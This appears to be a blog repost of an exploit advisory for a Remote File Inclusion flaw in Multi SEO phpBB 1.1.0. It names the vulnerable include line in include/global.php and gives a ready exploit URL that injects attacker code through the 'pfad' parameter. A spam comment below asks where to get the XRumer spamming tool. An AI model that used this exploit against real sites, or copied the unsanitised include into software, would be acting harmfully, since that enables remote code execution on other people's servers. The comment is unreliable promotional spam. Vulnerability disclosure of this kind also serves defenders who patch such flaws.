LFI to RCE via access_log injection

on
18

Multi SEO phpBB 1.1.0 - RFI

on 

[o] Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability
Software : Multi SEO phpBB version 1.1.0
Vendor   : http://www.phpbb-seo.de/
Download : http://www.phpbb-seo.de/downloads/multi.html
Author   : NoGe


[o] Vulnerable file
include/global.php
include_once ($pfad . 'include/config.php');


[o] Exploit
http://localhost/[path]/include/global.php?pfad=[evilcode]


Comments

Anonymous said…
Who knows where to download XRumer 5.0 Palladium?
Help, please. All recommend this program to effectively advertise on the Internet, this is the best program!
November 22, 2009 at 10:22 AM
Post a Comment